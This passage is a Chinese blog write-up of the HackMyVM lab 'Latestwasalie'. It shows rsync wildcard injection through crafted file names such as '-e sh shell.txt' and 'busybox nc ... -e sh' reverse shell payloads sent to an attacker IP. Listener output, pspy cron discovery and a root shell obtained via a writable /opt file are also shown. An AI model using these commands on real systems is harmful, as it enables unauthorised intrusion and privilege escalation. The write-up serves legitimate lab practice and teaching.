drwxr-xr-x 1 root root 4096 Apr 17 14:59 ..
-rw-r--r-- 1 1000 1000  293 Apr 17 14:59 .rsync_cmd
-rw-r--r-- 1 root root   93 Apr  4 02:40 report_20260404_024041_7a6e1f.txt
-rw-r--r-- 1 root root   93 Apr  4 02:40 report_20260404_024052_3606d7.txt
-rw-r--r-- 1 root root   93 Apr  4 02:41 report_20260404_024105_d10ac5.txt
-rw-r--r-- 1 root root   93 Apr  4 02:41 report_20260404_024115_a9301d.txt
$ cat .rsync._cmd
cat: .rsync._cmd: No such file or directory
$ cat .rsync_cmd
# Comando rsync ejecutado el vie 17 abr 2026 17:00:01 CEST
rsync -e 'ssh -i /home/backupusr/.ssh/id_ed25519' -av *.txt localhost:/home/backupusr/backup/

# Usuario: backupusr
# PID: 9275
# Directorio actual: /srv/platform/appdata/exports
# Directorio destino: localhost:/home/backupusr/backup
$

rysnc脚本,后面有星号,立马想到通配符注入

1
2
3
4
5
6
7
8
9
10
11
  
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.51] 60008
/bin/sh: 0: can't access tty; job control turned off
$ cd /data/exports
$ echo "bash -c 'busybox nc 192.168.56.104 5555 -e bash'" > shell.txt
$ chmod +x shell.txt
$ touch "./-e sh shell.txt"
$                                                                                                                                                           
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 5555 
[+] Listening for reverse shells on 0.0.0.0:5555127.0.0.1192.168.21.128192.168.56.104192.168.10.150172.17.0.1172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.56.104:5555
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/latestwasalie~192.168.56.51_Linux_x86_64/2026_04_17-15_09_03-918.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
backupusr@latestwasalie:/srv/platform/appdata/exports$

写公钥稳定权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh backupusr@192.168.56.51
The authenticity of host '192.168.56.51 (192.168.56.51)' can't be established.
ED25519 key fingerprint is: SHA256:d6ezTlKBOSbEyl5V4PgjMvMtAs3DKmNzThBWmeY13lU
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.51' (ED25519) to the list of known hosts.
Linux latestwasalie 6.12.74+deb13+1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr  4 15:38:02 2026 from 10.0.2.12

传个pspy64上去

1
2
3
4
5
6
7
8
9
2026/04/17 17:14:01 CMD: UID=0     PID=13444  | /usr/sbin/CRON -f 
2026/04/17 17:14:01 CMD: UID=0     PID=13445  | /usr/sbin/CRON -f 
2026/04/17 17:14:01 CMD: UID=1000  PID=13447  | /bin/sh -c /home/backupusr/backups.sh >/dev/null 2>&1 
2026/04/17 17:14:01 CMD: UID=0     PID=13446  | /usr/sbin/CRON -f 
2026/04/17 17:14:01 CMD: UID=0     PID=13448  | /bin/sh -c /opt/deploy/update-latestwasalie.sh >> /var/log/latestwasalie-cron.log 2>&1 
2026/04/17 17:14:01 CMD: UID=1000  PID=13449  | /bin/bash /home/backupusr/backups.sh 
2026/04/17 17:14:01 CMD: UID=1000  PID=13450  | /bin/bash /home/backupusr/backups.sh 
2026/04/17 17:14:01 CMD: UID=0     PID=13451  | /bin/sh -c /root/backups.sh >/dev/null 2>&1 
2026/04/17 17:14:01 CMD: UID=0     PID=13452  | /bin/bash /root/backups.sh

有很多定时任务,但主要是docker方面的,不过这里有一个backup.sh很显眼

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
backupusr@latestwasalie:~$ cat /home/backupusr/backups.sh
#!/bin/bash

# Script de backup de exports
# AUTOR: Admin Backup
# FECHA: 2026-04-06

SOURCE_DIR="/srv/platform/appdata/exports"
BACKUP_DIR="localhost:/home/backupusr/backup"
LOG_FILE="$SOURCE_DIR/.rsync_cmd"

# Cambiar al directorio fuente
cd "$SOURCE_DIR"

# Comando rsync para guardar en log
RSYNC_CMD="rsync -e 'ssh -i /home/backupusr/.ssh/id_ed25519' -av *.txt $BACKUP_DIR/"

# Guardar comando en fichero oculto fijo
cat > "$LOG_FILE" << EOF
# Comando rsync ejecutado el $(date)
$RSYNC_CMD

# Usuario: $(whoami)
# PID: $$
# Directorio actual: $(pwd)
# Directorio destino: $BACKUP_DIR
EOF

chmod 644 "$LOG_FILE"

# Ejecutar rsync directamente
echo "Ejecutando backup de archivos .txt..."
rsync -e "ssh -i /home/backupusr/.ssh/id_ed25519" -av *.txt "$BACKUP_DIR/"

# Confirmar archivo log
if [ -f "$LOG_FILE" ]; then
    echo "Backup completado. Comando guardado en: $LOG_FILE"
    ls -la "$LOG_FILE"
    echo "Contenido del log:"
    cat "$LOG_FILE"
fi

exit 0

好吧,这是我们拿shell的那个定时任务.

不过root的那个backup.sh我们没法访问

1
2
3
4
5
6
7
8
9
10
11
12
13
backupusr@latestwasalie:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/touch
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn

我们有touch的suid权限

那root的手法可能和user的手法相同.都是要写入某个文件然后通配符触发.

找到我们有写入权限的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
backupusr@latestwasalie:~$ find / -writable 2>/dev/null | grep -v -E '(proc|sys|dev|tmp|run)'
/srv/platform/appdata/exports
/srv/platform/appdata/exports/.rsync_cmd
/var/lock
/opt/registry/note.txt
/home/backupusr
/home/backupusr/.bashrc
/home/backupusr/.bash_history
/home/backupusr/backups.sh
/home/backupusr/.lesshst
/home/backupusr/.local
/home/backupusr/.local/share
/home/backupusr/.local/share/nano
/home/backupusr/pspy64
/home/backupusr/.selected_editor
/home/backupusr/.ssh
/home/backupusr/.ssh/config
/home/backupusr/.ssh/known_hosts
/home/backupusr/.ssh/authorized_keys
/home/backupusr/.ssh/id_ed25519.pub
/home/backupusr/.ssh/id_ed25519
/home/backupusr/.ssh/known_hosts.old
/home/backupusr/backup
/home/backupusr/backup/report_20260404_024115_a9301d.txt
/home/backupusr/backup/report_20260404_024052_3606d7.txt
/home/backupusr/backup/report_20260404_024105_d10ac5.txt
/home/backupusr/backup/fake.txt
/home/backupusr/backup/report_20260404_024041_7a6e1f.txt
/home/backupusr/.bash_logout
/home/backupusr/.gnupg
/home/backupusr/.gnupg/public-keys.d
/home/backupusr/.gnupg/trustdb.gpg
/home/backupusr/.gnupg/private-keys-v1.d
/home/backupusr/.gnupg/crls.d
/home/backupusr/.gnupg/crls.d/DIR.txt
/home/backupusr/.gnupg/pubring.kbx
/home/backupusr/.profile

嗯?我们怎么可以写入/opt下面的文件

1
2
backupusr@latestwasalie:~$ cat /opt/registry/note.txt
Docker registry service
1
2
3
backupusr@latestwasalie:~$ ls /opt/registry/
auth  config  data  docker-compose.yml  note.txt

不管了先写一个弹shell的命令进去

1
2
3
4
backupusr@latestwasalie:~$ echo "busybox nc 192.168.56.104 4444 -e sh" > /opt/registry/note.txt
backupusr@latestwasalie:~$ chmod +x /opt/registry/note.txt
chmod: cambiando los permisos de '/opt/registry/note.txt': Operación no permitida
backupusr@latestwasalie:~$ touch /opt/registry/'-e sh note.txt'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444127.0.0.1192.168.21.128192.168.56.104192.168.10.150172.17.0.1172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.56.104:4444
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/latestwasalie~192.168.56.51_Linux_x86_64/2026_04_17-15_29_03-014.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@latestwasalie:/opt/registry#

成了

还是很不错的一台靶机,供应链投毒很少遇到,这次学到了

#HVM
HackMyVM-Latestwasalie
http://example.com/2026/04/17/HackMyVM-Latestwasalie/
Author
Skyarrow
Posted on
April 17, 2026
Licensed under